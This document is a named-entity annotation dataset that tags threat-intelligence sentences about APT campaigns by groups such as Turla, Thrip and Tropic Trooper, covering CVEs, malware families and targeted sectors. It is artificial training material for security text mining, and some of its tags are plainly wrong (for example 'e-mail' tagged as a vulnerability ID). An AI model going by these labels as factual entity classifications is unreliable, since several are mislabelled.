O + +For O +example O +, O +at O +the O +end O +of O +2016 S-TIME +CTU S-SECTEAM +researchers O +observed O +the O +threat O +actors O +using O +native O +system O +functionality O +to O +disable O +logging O +processes O +and O +delete O +logs O +within O +a O +network O +. O + +The O +group O +has O +been O +active O +since O +at O +least O +2010 S-TIME +and O +was O +behind O +many O +previous O +attack B-ACT +campaigns E-ACT +resulting O +in O +the O +theft O +of O +massive O +amounts O +of O +data O +from O +the O +directors O +and O +managers O +of O +US-based O +defense B-IDTY +contractors E-IDTY +. O + +attacks O +to O +a O +Chinese-speaking B-LOC +threat I-LOC +actor I-LOC +group E-LOC +called O +LuckyMouse O +. O + +LuckyMouse O +has O +been O +spotted O +using O +a O +widely O +used O +Microsoft B-TOOL +Office E-TOOL +vulnerability O +( O +CVE-2017-11882 S-VULID +) O +. O + +This O +time O +the O +group O +chose O +a O +national O +data O +center O +as O +its O +target O +from O +an O +unnamed O +country O +in O +Central B-LOC +Asia E-LOC +in O +an O +attempt O +to O +gain O +" O +access O +to O +a O +wide O +range O +of O +government O +resources O +at O +one O +fell O +swoop O +" O +. O + +The O +initial O +attack O +vector O +used O +in O +the O +attack O +against O +the O +data O +center O +is O +unclear O +, O +but O +researchers O +believe O +LuckyMouse S-APT +possibly O +had O +conducted O +watering B-ACT +hole E-ACT +or O +phishing B-ACT +attacks E-ACT +to O +compromise O +accounts O +belonging O +to O +employees S-IDTY +at O +the O +national O +data O +center O +. O + +According O +to O +the O +researchers O +, O +the O +group O +injected O +malicious O +JavaScript B-MAL +code E-MAL +into O +the O +official O +government O +websites O +associated O +with O +the O +data O +center O +in O +order O +to O +conduct O +watering B-ACT +hole I-ACT +attacks E-ACT +. 
O + +the O +targeted O +system O +with O +a O +piece O +of O +malware O +called O +HyperBro S-MAL +, O +a O +Remote B-MAL +Access I-MAL +Trojan E-MAL +( O +RAT S-MAL +) O +. O + +The O +main O +command O +and O +control O +( O +C&C S-TOOL +) O +server O +used O +in O +this O +attack O +is O +hosted O +on O +an O +IP S-PROT +address O +which O +belongs O +to O +a O +Ukrainian O +ISP O +, O +specifically O +to O +a O +MikroTik S-MAL +router O +running O +a O +firmware O +version O +released O +in O +March B-TIME +2016 E-TIME +. O + +the O +targets O +of O +the O +hacking O +group O +were O +in O +the O +automotive S-IDTY +. O + +Dell B-SECTEAM +SecureWorks E-SECTEAM +researchers O +unveiled O +a O +report O +on O +Threat O +Group-3390 S-APT +that O +has O +targeted O +companies O +around O +the O +world O +while O +stealing O +massive O +amounts O +of O +industrial O +data O +. O + +The O +group O +, O +believed O +to O +be O +based O +in O +China S-LOC +, O +has O +also O +targeted O +defense B-IDTY +contractors E-IDTY +, O +colleges S-IDTY +and O +universities S-IDTY +, O +law B-IDTY +firms E-IDTY +, O +and O +political B-IDTY +organizations E-IDTY +— O +including O +organizations O +related O +to O +Chinese O +minority B-IDTY +ethnic I-IDTY +groups E-IDTY +. O + +LAS O +VEGAS—Today O +at O +the O +Black O +Hat O +information O +security O +conference O +, O +Dell B-SECTEAM +SecureWorks E-SECTEAM +researchers O +unveiled O +a O +report O +on O +a O +newly O +detected O +hacking O +group O +that O +has O +targeted O +companies O +around O +the O +world O +while O +stealing O +massive O +amounts O +of O +industrial O +data O +. 
O + +Designated O +as O +Threat B-APT +Group I-APT +3390 E-APT +and O +nicknamed O +" O +Emissary B-APT +Panda E-APT +" O +by O +researchers O +, O +the O +hacking O +group O +has O +compromised O +victims' O +networks O +largely O +through O +" O +watering B-ACT +hole E-ACT +" O +attacks O +launched O +from O +over O +100 O +compromised O +legitimate O +websites O +, O +sites O +picked O +because O +they O +were O +known O +to O +be O +frequented O +by O +those O +targeted O +in O +the O +attack O +. O + +the O +United S-LOC +Kingdom S-LOC +had O +data O +stolen O +by O +members O +of O +Emissary B-APT +Panda E-APT +. O + +the O +US S-LOC +had O +data O +stolen O +by O +members O +of O +Emissary B-APT +Panda E-APT +. O + +No O +zero-day S-VULNAME +vulnerabilities O +were O +used O +to O +breach O +targeted O +networks O +, O +instead O +" O +TG-3390 O +relied O +on O +old O +vulnerabilities O +such O +as O +CVE-2011-3544 S-VULID +" O +— O +a O +near-year-old O +Java O +security O +hole O +— O +" O +and O +CVE-2010-0738 S-VULID +to O +compromise O +their O +targets O +" O +, O +Dell B-SECTEAM +SecureWorks' E-SECTEAM +researchers O +reported O +. O + +The O +group O +used O +a O +number O +of O +tools O +common O +to O +other O +Chinese B-LOC +hacking I-LOC +groups E-LOC +, O +but O +they O +had O +a O +few O +unique O +tools O +of O +their O +own O +with O +interfaces O +developed O +for O +Standard O +( O +Simplified O +) O +Chinese S-LOC +. O + +If O +the O +address O +falls O +within O +ranges O +that O +the O +attackers O +are O +interested O +in O +, O +the O +malicious O +site O +waits O +for O +their O +next O +page O +view O +to O +drop O +an O +exploit S-VULNAME +on O +the O +desirable O +target O +'s O +PC O +. O + +Visitors O +to O +sites O +exploited O +by O +Emissary O +Panda O +are O +directed O +by O +code O +embedded O +in O +the O +sites O +to O +a O +malicious O +webpage O +, O +which O +screens O +their O +IP S-PROT +address O +. 
O + +There O +has O +also O +been O +at O +least O +one O +victim O +targeted O +by O +a O +spear-phishing S-ACT +attack E-ACT +. O + +A O +variety O +of O +malware O +, O +including O +the O +PlugX B-MAL +tool E-MAL +, O +was O +shared O +with O +other O +known O +Chinese B-LOC +threat I-LOC +groups E-LOC +. O + +Once O +inside O +networks O +, O +the O +group O +generally O +targeted O +Windows S-OS +network O +domain O +controllers O +and O +Exchange O +e-mail B-ACT +servers E-ACT +, O +targeting O +user O +credentials O +to O +allow O +them O +to O +move O +to O +other O +systems O +throughout O +the O +targeted O +network O +. O + +They O +used O +an O +exploit S-VULNAME +of O +Internet O +Information O +Server O +to O +inject O +keylogger S-MAL +and O +backdoor S-MAL +malware S-MAL +onto O +the O +Exchange O +server O +. O + +But O +two O +tools O +used O +were O +unique O +to O +the O +group O +: O +ASPXTool S-MAL +, O +an O +Internet B-TOOL +Information I-TOOL +Services E-TOOL +( O +IIS S-TOOL +) O +specific O +" O +Web B-TOOL +shell E-TOOL +" O +used O +to O +gain O +access O +to O +servers O +inside O +a O +target O +'s O +network O +; O +and O +the O +OwaAuth S-APT +credential O +stealing O +tool O +and O +Web B-TOOL +shell E-TOOL +, O +used O +to O +attack O +Microsoft S-IDTY +Exchange O +servers O +running O +the O +Web O +Outlook S-TOOL +interface O +. O + +By O +using O +such O +features O +and O +tools O +, O +attackers O +are O +hoping O +to O +blend O +in O +on O +the O +victim O +'s O +network O +and O +hide O +their O +activity O +in O +a O +sea O +of O +legitimate O +processes O +. O + +TAA S-SECTEAM +leverages O +advanced O +artificial O +intelligence O +and O +machine O +learning O +that O +combs O +through O +Symantec S-SECTEAM +'s O +data O +lake O +of O +telemetry O +in O +order O +to O +spot O +patterns O +associated O +with O +targeted B-ACT +attacks E-ACT +. 
O + +January B-TIME +2018 E-TIME +, O +TAA S-SECTEAM +triggered O +an O +alert O +at O +a O +large O +telecoms B-IDTY +operator E-IDTY +in O +Southeast B-LOC +Asia E-LOC +. O + +Thrip O +was O +using O +PsExec S-MAL +to O +move O +laterally O +between O +computers O +on O +the O +company O +'s O +network O +. O + +TAA S-SECTEAM +triggered O +an O +alert O +at O +a O +large O +telecoms B-IDTY +operator E-IDTY +in O +Southeast B-LOC +Asia E-LOC +. O + +AA O +triggered O +an O +alert O +at O +a O +large O +telecoms B-IDTY +operator E-IDTY +in O +Southeast O +Asia O +. O + +PsExec S-MAL +is O +a O +Microsoft S-IDTY +Sysinternals O +tool O +for O +executing O +processes O +on O +other O +systems O +and O +is O +one O +of O +the O +most O +frequently O +seen O +legitimate O +pieces O +of O +software O +used O +by O +attackers O +attempting O +to O +live O +off O +the O +land O +. O + +TAA S-SECTEAM +not O +only O +flagged O +this O +malicious O +use O +of O +PsExec S-MAL +, O +it O +also O +told O +us O +what O +the O +attackers O +were O +using O +it O +for O +. O + +Thrip O +was O +attempting O +to O +remotely O +install O +a O +previously O +unknown O +piece O +of O +malware O +( O +Infostealer.Catchamas S-MAL +) O +on O +computers O +within O +the O +victim O +'s O +network O +. O + +three O +computers O +in O +China S-LOC +being O +used O +to O +launch O +the O +Thrip B-ACT +attacks E-ACT +. O + +Perhaps O +the O +most O +worrying O +discovery O +we O +made O +was O +that O +Thrip O +had O +targeted O +a O +satellite B-IDTY +communications I-IDTY +operator E-IDTY +. O + +Thrip O +seemed O +to O +be O +mainly O +interested O +in O +the O +operational O +side O +of O +the O +company O +. O + +This O +suggests O +to O +us O +that O +Thrip O +'s O +motives O +go O +beyond O +spying O +and O +may O +also O +include O +disruption O +. 
O + +Armed O +with O +this O +information O +about O +the O +malware O +and O +living O +off O +the O +land B-ACT +tactics E-ACT +being O +used O +by O +this O +group O +of O +attackers O +whom O +we O +named O +Thrip O +, O +we O +broadened O +our O +search O +to O +see O +if O +we O +could O +find O +similar O +patterns O +that O +indicated O +Thrip O +had O +been O +targeting O +other O +organizations O +. O + +The O +group O +had O +also O +targeted O +three O +different O +telecoms B-IDTY +operators E-IDTY +, O +all O +based O +in O +Southeast B-LOC +Asia E-LOC +. O + +In O +all O +cases O +, O +based O +on O +the O +nature O +of O +the O +computers O +infected O +by O +Thrip O +, O +it O +appeared O +that O +the O +telecoms B-IDTY +companies E-IDTY +themselves O +and O +not O +their O +customers S-IDTY +were O +the O +targets O +of O +these O +attacks O +. O + +Catchamas S-FILE +is O +a O +custom O +Trojan S-MAL +designed O +to O +steal O +information O +from O +an O +infected O +computer O +and O +contains O +additional O +features O +designed O +to O +avoid O +detection O +. O + +Many O +of O +the O +tools O +they O +use O +now O +feature O +new O +behaviors O +, O +including O +a O +change O +in O +the O +ACT O +they O +maintain O +a O +foothold O +in O +the O +targeted O +network O +. O + +Execute O +a O +command O +through O +exploits O +for O +CVE-2017-11882 S-VULID +. O + +Execute O +a O +command O +through O +exploits O +for O +CVE-2018-0802 S-VULID +. O + +The O +backdoor O +will O +load O +the O +encrypted O +configuration O +file O +and O +decrypt O +it O +, O +then O +use O +Secure B-PROT +Sockets I-PROT +Layer E-PROT +( O +SSL S-PROT +) O +protocol O +to O +connect O +to O +command-and-control S-TOOL +( O +C&C S-TOOL +) O +servers O +. O + +TClient S-MAL +is O +actually O +one O +of O +Tropic O +Trooper O +'s O +other O +backdoors O +. 
O + +The O +malicious O +loader O +will O +use O +dynamic-link B-TOOL +library E-TOOL +( O +DLL S-TOOL +) O +hijacking O +— O +injecting O +malicious O +code O +into O +a O +process O +of O +a O +file/application O +— O +on O +sidebar.exe S-FILE +and O +launch O +dllhost.exe S-FILE +( O +a O +normal O +file O +) O +. O + +TClient S-MAL +, O +for O +instance O +, O +uses O +DLL B-ACT +hijacking I-ACT +and I-ACT +injection E-ACT +that O +may O +not O +be O +as O +noticeable O +to O +others O +. O + +The O +backdoor O +noted O +by O +other O +security O +researchers O +was O +encoded O +with O +different O +algorithms O +and O +configured O +with O +different O +parameter O +names O +in O +2016 S-TIME +, O +for O +instance O +. O + +Taiwan S-LOC +has O +been O +a O +regular O +target O +of O +Cyber B-ACT +Espionage E-ACT +threat O +actors O +for O +a O +number O +of O +years O +. O + +In O +early O +August S-TIME +, O +Unit B-SECTEAM +42 E-SECTEAM +identified O +two O +attacks O +using O +similar O +techniques O +. O + +which O +has O +been O +active O +since O +at O +least O +2011 S-TIME +. O + +One O +of O +the O +attacks O +used O +Tropic O +Trooper O +'s O +known O +Yahoyah S-MAL +malware S-MAL +, O +but O +the O +other O +attack O +deployed O +the O +widely O +available O +Poison B-ACT +Ivy I-ACT +RAT E-ACT +. O + +This O +confirms O +the O +actors O +are O +using O +Poison B-MAL +Ivy E-MAL +as O +part O +of O +their O +toolkit O +, O +something O +speculated O +in O +the O +original O +Trend B-SECTEAM +Micro E-SECTEAM +report O +but O +not O +confirmed O +by O +them O +. O + +The O +document O +attached O +to O +this O +e-mail B-VULID +exploits S-VULNAME +CVE-2012-0158 S-VULID +. O + +As O +we O +have O +noted O +in O +many O +earlier O +reports O +, O +attackers O +commonly O +use O +decoy B-FILE +files E-FILE +to O +trick O +victims O +into O +thinking O +a O +malicious O +document O +is O +actually O +legitimate O +. 
O + +Further O +analysis O +uncovered O +a O +handful O +of O +ties O +indicating O +the O +actors O +may O +also O +be O +using O +the O +PCShare B-MAL +malware I-MAL +family E-MAL +, O +which O +has O +not O +been O +previously O +tied O +to O +the O +group O +. O + +This O +matches O +with O +known O +Tactics O +, O +Techniques O +, O +and O +Procedures O +( O +TTPs O +) O +for O +Tropic B-APT +Trooper E-APT +, O +targeting O +both O +government B-IDTY +institutions E-IDTY +and O +also O +the O +energy B-IDTY +industry E-IDTY +in O +Taiwan O +. O + +Tropic B-APT +Trooper E-APT +is O +also O +still O +exploiting O +CVE-2012-0158 S-VULID +, O +as O +are O +many O +threat O +actors O +. O + +The O +Tropic B-APT +Trooper I-APT +threat I-APT +actor I-APT +group E-APT +has O +been O +known O +to O +target O +governments S-IDTY +and O +organizations O +in O +the O +Asia B-LOC +Pacific E-LOC +region O +for O +at O +least O +six O +years O +. O + +Turla S-APT +is O +a O +notorious O +group O +that O +has O +been O +targeting O +governments S-IDTY +. O + +Turla S-APT +is O +known O +to O +run O +watering B-ACT +hole E-ACT +and O +spearphishing B-ACT +campaigns E-ACT +to O +better O +pinpoint O +their O +targets O +. O + +Turla S-APT +is O +a O +notorious O +group O +that O +has O +been O +targeting O +government B-IDTY +officials E-IDTY +. O + +The O +documents S-FILE +attached O +to O +spear-phishing S-ACT +e-mails E-ACT +used O +in O +both O +attacks O +contain O +code O +that O +exploits O +CVE-2012-0158 S-VULID +, O +which O +despite O +its O +age O +remains O +one O +of O +the O +most O +common O +Microsoft B-TOOL +Word E-TOOL +vulnerabilities S-VULNAME +being O +exploited O +by O +multiple O +threat O +actors O +. O + +Turla S-APT +is O +a O +notorious O +group O +that O +has O +been O +targeting O +diplomats S-IDTY +. O + +The O +codename O +for O +Turla B-APT +APT I-APT +group E-APT +in O +this O +presentation O +is O +MAKERSMARK O +. 
O + +The O +Intercept O +reported O +that O +there O +exists O +a O +2011 S-TIME +presentation O +by O +Canada B-IDTY +'s I-IDTY +Communication I-IDTY +Security I-IDTY +Establishment E-IDTY +( O +CSE S-IDTY +) O +outlining O +the O +errors O +made O +by O +the O +Turla S-APT +operators O +during O +their O +operations O +even O +though O +the O +tools O +they O +use O +are O +quite O +advanced O +. O + +The O +witnessed O +techniques O +, O +tactics O +and O +procedures O +( O +TTPs O +) O +are O +in-line O +with O +what O +we O +usuallysee O +in O +Turla B-APT +'s I-APT +operation E-APT +: O +a O +first O +stage B-ACT +backdoor E-ACT +, O +such O +as O +Skipper S-MAL +, O +likely O +delivered O +through O +spearphishing S-ACT +followed O +by O +the O +appearance O +on O +the O +compromised O +system O +of O +a O +second O +stage O +backdoor O +, O +Gazerin O +this O +case O +. O + +Southeastern B-LOC +Europe E-LOC +as O +well O +as O +countries O +in O +the O +former O +Soviet B-LOC +Union I-LOC +Republichas E-LOC +recently O +been O +the O +main O +target O +. O + +Finally O +, O +there O +are O +many O +similarities O +between O +Gazer S-MAL +and O +other O +second O +stage O +backdoors S-MAL +used O +by O +the O +Turla S-APT +group O +such O +as O +Carbon S-APT +and O +Kazuar S-APT +. O + +Skipper S-MAL +, O +which O +has O +been O +linked O +to O +Turla S-APT +in O +the O +past O +, O +was O +found O +alongside O +Gazer S-MAL +in O +most O +cases O +we O +investigated O +. O + +Turla B-APT +APT I-APT +group E-APT +makes O +an O +extra O +effort O +to O +avoid O +detection O +by O +wiping O +files O +securely O +, O +changing O +the O +strings O +and O +randomizing O +what O +could O +be O +simple O +markers O +through O +the O +different O +backdoor O +versions O +. 
O + +The O +attackers O +behind O +Epic B-MAL +Turla E-MAL +have O +infected O +several O +hundred O +computers O +in O +more O +than O +45 O +countries O +, O +including O +government B-IDTY +institutions E-IDTY +. O + +Turla S-APT +all O +uses O +an O +encrypted B-MAL +container E-MAL +to O +store O +the O +malware O +'s O +components O +and O +configuration O +and O +they O +also O +log O +their O +actions O +in O +a O +file O +. O + +Over O +the O +last O +10 O +months O +, O +Kaspersky B-SECTEAM +Lab E-SECTEAM +researchers O +have O +analyzed O +a O +massive O +cyber-espionage O +operation O +which O +we O +call O +" O +Epic B-MAL +Turla E-MAL +" O +. O + +We O +also O +observed O +exploits O +against O +older O +( O +patched O +) O +vulnerabilities O +, O +social B-IDTY +engineering E-IDTY +techniques O +and O +watering B-ACT +hole E-ACT +strategies O +in O +these O +attacks O +. O + +The O +attackers O +behind O +Epic B-MAL +Turla E-MAL +have O +infected O +several O +hundred O +computers O +in O +more O +than O +45 O +countries O +, O +including O +embassies S-IDTY +. O + +The O +attackers O +behind O +Epic B-MAL +Turla E-MAL +have O +infected O +several O +hundred O +computers O +in O +more O +than O +45 O +countries O +, O +including O +military S-IDTY +. O + +The O +attackers O +behind O +Epic B-MAL +Turla E-MAL +have O +infected O +several O +hundred O +computers O +in O +more O +than O +45 O +countries O +, O +including O +education S-IDTY +. O + +When O +G-Data S-SECTEAM +published O +on O +Turla/Uroburos S-APT +back O +in O +February O +, O +several O +questions O +remained O +unanswered O +. O + +The O +attackers O +behind O +Epic B-MAL +Turla E-MAL +have O +infected O +several O +hundred O +computers O +in O +more O +than O +45 O +countries O +, O +including O +research O +and O +pharmaceutical B-IDTY +companies E-IDTY +. 
O + +The O +primary O +backdoor O +used O +in O +the O +Epic B-ACT +attacks E-ACT +is O +also O +known O +as O +" O +WorldCupSec S-APT +" O +, O +" O +TadjMakhal S-APT +" O +, O +" O +Wipbot S-APT +" O +or O +" O +Tavdig S-APT +" O +. O + +Thrip O +'s O +motive O +is O +likely O +espionage O +and O +its O +targets O +include O +those O +in O +the O +communications S-IDTY +, O +geospatial B-IDTY +imaging E-IDTY +, O +and O +defense B-IDTY +sectors E-IDTY +, O +both O +in O +the O +United B-LOC +States E-LOC +and O +Southeast B-LOC +Asia E-LOC +. O + +One O +big O +unknown O +was O +the O +infection O +vector O +for O +Turla S-APT +( O +aka O +Snake S-APT +or O +Uroburos S-APT +) O +. O + +The O +mothership O +server O +is O +generally O +a O +VPS S-TOOL +, O +which O +runs O +the O +Control O +panel O +software O +used O +to O +interact O +with O +the O +victims O +. O + +the O +backdoor O +is O +packaged O +together O +with O +the O +CVE-2013-5065 S-VULID +EoP S-TOOL +exploit S-VULNAME +and O +heavily O +obfuscated O +. O + +Once O +a O +victim O +is O +confirmed O +as O +" O +interesting O +" O +, O +the O +attackers O +upload O +another O +Epic B-MAL +backdoor E-MAL +which O +has O +a O +unique O +ID O +used O +to O +control O +this O +specific O +victim O +. O + +Our O +analysis O +indicates O +this O +is O +a O +sophisticated O +multi-stage O +infection O +; O +which O +begins O +with O +Epic B-MAL +Turla E-MAL +. O + +this O +attack O +against O +a O +Kaspersky B-SECTEAM +Lab E-SECTEAM +user O +on O +August B-TIME +5 E-TIME +, O +2014 S-TIME +. O + +VENOMOUS B-APT +BEAR E-APT +is O +an O +advanced O +, O +Russia-based S-LOC +adversary O +that's O +been O +active O +since O +at O +least O +2004 S-TIME +. O + +Venomous B-APT +Bear E-APT +has O +deployed O +malware O +to O +targets O +using O +several O +novel B-ACT +methods E-ACT +. 
O + +For O +years O +, O +Turla S-APT +has O +relied O +, O +among O +other O +impersonations O +, O +on O +fake B-MAL +Flash I-MAL +installers E-MAL +to O +compromise O +victims O +. O + +Turla S-APT +merely O +uses O +the O +Adobe O +brand O +to O +trick O +users O +into O +downloading O +the O +malware O +. O + +By O +looking O +at O +our O +telemetry O +, O +we O +found O +evidence O +that O +Turla S-APT +installers O +were O +exfiltrating O +information O +to O +get.adobe.com O +URLs O +since O +at O +least O +July B-TIME +2016 E-TIME +. O + +Thus O +, O +it O +is O +clear O +they O +are O +trying O +to O +be O +as O +stealthy O +as O +possible O +by O +hiding O +in O +the O +network B-ACT +traffic E-ACT +of O +the O +targeted O +organizations O +. O + +Finally O +, O +some O +of O +the O +victims O +are O +also O +infected O +with O +other O +Turla-related S-APT +malware S-MAL +such O +as O +ComRAT S-MAL +or O +Gazer S-MAL +. O + +Kaspersky B-SECTEAM +Lab E-SECTEAM +documented O +this O +behavior O +in O +2014 S-TIME +. O + +It O +is O +not O +a O +new O +tactic O +for O +Turla S-APT +to O +rely O +on O +fake B-MAL +Flash I-MAL +installers E-MAL +to O +try O +to O +trick O +the O +user O +to O +install O +one O +of O +their O +backdoors O +. O + +Turla S-APT +operators O +could O +use O +an O +already-compromised O +machine O +in O +the O +network O +of O +the O +victim O +'s O +organization O +to O +perform O +a O +local O +MitM B-ACT +attack E-ACT +. O + +Our O +January B-TIME +2018 E-TIME +white O +paper O +was O +the O +first O +public O +analysis O +of O +a O +Turla B-ACT +campaign E-ACT +called O +Mosquito S-ACT +. O + +It O +is O +not O +the O +first O +time O +Turla S-APT +has O +used O +generic B-MAL +tools E-MAL +. O + +In O +the O +past O +, O +we O +have O +seen O +the O +group O +using O +open-source B-MAL +password I-MAL +dumpers E-MAL +such O +as O +Mimikatz S-MAL +. 
O + +Starting O +in O +March B-TIME +2018 E-TIME +, O +we O +observed O +a O +significant O +change O +in O +the O +campaign O +: O +it O +now O +leverages O +the O +open O +source O +exploitation O +framework O +Metasploit S-MAL +before O +dropping O +the O +custom O +Mosquito O +backdoor O +. O + +Even O +an O +experienced O +user O +can O +be O +fooled O +by O +downloading O +a O +malicious B-FILE +file E-FILE +that O +is O +apparently O +from O +adobe.com S-ACT +, O +since O +the O +URL O +and O +the O +IP S-PROT +address O +correspond O +to O +Adobe O +'s O +legitimate O +infrastructure O +. O + +However O +, O +to O +our O +knowledge O +, O +this O +is O +the O +first O +time O +Turla S-APT +has O +used O +Metasploit S-MAL +as O +a O +first O +stage O +backdoor O +, O +instead O +of O +relying O +on O +one O +of O +its O +own O +tools O +such O +as O +Skipper S-MAL +. O + +Traffic O +was O +intercepted O +on O +a O +node O +between O +the O +end O +machine O +and O +the O +Adobe O +servers O +, O +allowing O +Turla S-APT +'s O +operators O +to O +replace B-ACT +the I-ACT +legitimate I-ACT +Flash I-ACT +executable E-ACT +with O +a O +trojanized O +version O +. O + +At O +the O +beginning O +of O +March B-TIME +2018 E-TIME +, O +as O +part O +of O +our O +regular O +tracking O +of O +Turla S-APT +'s O +activities S-ACT +, O +we O +observed O +some O +changes O +in O +the O +Mosquito B-ACT +campaign E-ACT +. O + +In O +this O +post O +, O +we O +have O +presented O +the O +evolutions O +of O +the O +Turla B-ACT +Mosquito I-ACT +campaign E-ACT +over O +the O +last O +few O +months O +. O + +Primary O +targets O +for O +this O +adversary O +are O +in O +the O +government S-IDTY +, O +aerospace S-IDTY +, O +NGO S-IDTY +, O +defense S-IDTY +, O +cryptology S-IDTY +and O +education B-IDTY +sectors E-IDTY +. 
O + +Turla S-APT +'s O +campaign O +still O +relies O +on O +a O +fake O +Flash S-TOOL +installer O +but O +, O +instead O +of O +directly O +dropping O +the O +two O +malicious O +DLLs O +, O +it O +executes O +a O +Metasploit B-MAL +shellcode I-MAL +and I-MAL +drops E-MAL +, O +or O +downloads O +from O +Google O +Drive O +, O +a O +legitimate O +Flash S-TOOL +installer O +. O + +The O +Turla S-APT +espionage O +group O +has O +been O +targeting O +various O +institutions O +for O +many O +years O +. O + +Recently O +, O +we O +found O +several O +new O +versions O +of O +Carbon S-MAL +, O +a O +second O +stage O +backdoor O +in O +the O +Turla S-APT +group O +arsenal O +. O + +The O +Turla S-APT +group O +is O +known O +to O +be O +painstaking O +and O +work O +in O +stages O +, O +first O +doing O +reconnaissance O +on O +their O +victims' O +systems O +before O +deploying O +their O +most O +sophisticated O +tools O +such O +as O +Carbon S-MAL +. O + +Kaspersky B-SECTEAM +APT I-SECTEAM +Intelligence I-SECTEAM +Reporting I-SECTEAM +subscription E-SECTEAM +, O +customers O +received O +an O +update O +in O +mid-February S-TIME +2017 S-TIME +. O + +Like O +previous O +Turla B-ACT +activity E-ACT +, O +WhiteBear S-MAL +leverages O +compromised B-ACT +websites E-ACT +and O +hijacked O +satellite O +connections O +for O +command O +and O +control O +( O +C2 S-TOOL +) O +infrastructure O +. O + +WhiteBear S-MAL +is O +a O +parallel O +project O +or O +second O +stage O +of O +the O +Skipper B-MAL +Turla E-MAL +cluster O +of O +activity O +documented O +in O +another O +private O +intelligence O +report O +" O +Skipper B-MAL +Turla E-MAL +– O +the O +White B-MAL +Atlas E-MAL +framework O +" O +from O +mid-2016 S-TIME +. O + +However O +, O +despite O +the O +similarities O +to O +previous O +Turla B-ACT +campaigns E-ACT +, O +we O +believe O +that O +WhiteBear S-MAL +is O +a O +distinct O +project O +with O +a O +separate O +focus O +. 
O + +From O +February S-TIME +to O +September B-TIME +2016 E-TIME +, O +WhiteBear B-ACT +activity E-ACT +was O +narrowly O +focused O +on O +embassies S-IDTY +and O +consular O +operations O +around O +the O +world O +. O + +Continued O +WhiteBear B-ACT +activity E-ACT +later O +shifted O +to O +include O +defense-related B-IDTY +organizations E-IDTY +into O +June B-TIME +2017 E-TIME +. O + +All O +of O +these O +early O +WhiteBear S-MAL +targets O +were O +related O +to O +embassies S-IDTY +and O +diplomatic/foreign O +affair O +organizations O +. O + +Thus O +, O +Turla S-APT +operators O +had O +access O +to O +some O +highly O +sensitive O +information O +( O +such O +as O +emails S-TOOL +sent O +by O +the O +German B-IDTY +Foreign I-IDTY +Office I-IDTY +staff E-IDTY +) O +for O +almost O +a O +year O +. O + +Our O +investigation O +also O +led O +to O +the O +discovery O +of O +dozens O +of O +email S-TOOL +addresses O +registered O +by O +Turla S-APT +operators O +for O +this O +campaign O +and O +used O +to O +receive O +exfiltrated O +data O +from O +the O +victims O +. O + +It O +mainly O +targets O +Microsoft S-IDTY +Outlook S-TOOL +, O +a O +widely O +used O +mail O +client O +, O +but O +also O +targets O +The O +Bat! O +, O +a O +mail O +client O +very O +popular O +in O +Eastern O +Europe O +. O + +First O +, O +Turla S-APT +steals O +emails S-TOOL +by O +forwarding O +all O +outgoing O +emails S-TOOL +to O +the O +attackers O +. O + +We O +identified O +several O +European B-IDTY +governments E-IDTY +and O +defense B-IDTY +companies E-IDTY +compromised O +with O +this O +group O +. O + +What O +actually O +happens O +is O +that O +the O +malware O +is O +able O +to O +decode O +data O +from O +the O +PDF B-MAL +documents E-MAL +and O +interpret O +it O +as O +commands O +for O +the O +backdoor O +. 
O + +In O +early O +2018 S-TIME +, O +multiple O +media S-IDTY +claimed O +that O +Turla S-APT +operators O +used O +mail B-ACT +attachments E-ACT +to O +control O +infected O +machines O +. O + +As O +detailed O +in O +the O +previous O +section O +, O +this O +malware O +is O +able O +to O +manipulate O +and O +exfiltrate O +emails S-TOOL +. O + +To O +our O +knowledge O +, O +Turla S-APT +is O +the O +only O +espionage O +group O +that O +currently O +uses O +a O +backdoor O +entirely O +controlled O +by O +emails S-TOOL +, O +and O +more O +specifically O +via O +PDF B-MAL +attachments E-MAL +. O + +The O +attackers O +first O +infected O +in O +March B-TIME +2017 E-TIME +. O + +Our O +research O +shows O +that O +compromised O +organizations O +are O +at O +risk O +of O +not O +only O +being O +spied O +on O +by O +the O +Turla S-APT +group O +who O +planted O +the O +backdoor O +, O +but O +also O +by O +other O +attackers O +. O + +The O +developers O +refer O +to O +this O +tool O +by O +the O +name O +Kazuar S-MAL +, O +which O +is O +a O +Trojan S-MAL +written O +using O +the O +Microsoft.NET O +Framework O +that O +offers O +actors O +complete O +access O +to O +compromised O +systems O +targeted O +by O +its O +operator O +. O + +We O +suspect O +the O +Kazuar B-MAL +tool E-MAL +may O +be O +linked O +to O +the O +Turla S-APT +threat O +actor O +group O +( O +also O +known O +as O +Uroburos S-APT +and O +Snake S-APT +) O +, O +who O +have O +been O +reported O +to O +have O +compromised O +embassies S-IDTY +, O +defense B-IDTY +contractors E-IDTY +, O +educational B-IDTY +institutions E-IDTY +, O +and O +research B-IDTY +organizations E-IDTY +across O +the O +globe O +. O + +This O +is O +also O +a O +full-featured B-MAL +backdoor E-MAL +controlled O +by O +email S-ACT +, O +and O +which O +can O +work O +independently O +of O +any O +other O +Turla S-APT +component O +. 
O + +A O +hallmark O +of O +Turla S-APT +operations O +is O +iterations O +of O +their O +tools O +and O +code B-ACT +lineage E-ACT +in O +Kazuar S-MAL +can O +be O +traced O +back O +to O +at O +least O +2005 S-TIME +. O + +If O +the O +hypothesis O +is O +correct O +and O +the O +Turla S-APT +threat O +group O +is O +using O +Kazuar S-MAL +, O +we O +believe O +they O +may O +be O +using O +it O +as O +a O +replacement O +for O +Carbon S-MAL +and O +its O +derivatives O +. O + +We O +used O +a O +combination O +of O +tools O +such O +as O +NoFuserEx S-MAL +, O +ConfuserEx B-MAL +Fixer E-MAL +, O +ConfuserEx B-MAL +Switch I-MAL +Killer E-MAL +, O +and O +de4d0t S-MAL +in O +order O +to O +deobfuscate O +the O +code O +for O +in O +depth O +analysis O +. O + +Kazuar S-SECTEAM +generates O +its O +mutex O +by O +using O +a O +process O +that O +begins O +with O +obtaining O +the O +MD5 S-ENCR +hash O +of O +a O +string O +" O +[username]=>singleton-instance-mutex O +" O +. O + +The O +subject O +is O +a O +series O +of O +targeted B-ACT +attacks E-ACT +against O +private B-IDTY +companies E-IDTY +. O + +e O +uncovered O +the O +activity O +of O +a O +hacking O +group O +which O +has O +Chinese O +origins O +. O + +Also O +, O +by O +creating O +this O +type O +of O +API B-ACT +access E-ACT +, O +Turla S-APT +could O +use O +one O +accessible O +server O +as O +a O +single O +point O +to O +dump O +data O +to O +and O +exfiltrate O +data O +from O +. O + +According O +to O +our O +estimations O +, O +this O +group O +has O +been O +active O +for O +several O +years O +and O +specializes O +in O +cyberattacks O +against O +the O +online B-IDTY +video I-IDTY +game I-IDTY +industry E-IDTY +. O + +Based O +on O +our O +analysis O +, O +we O 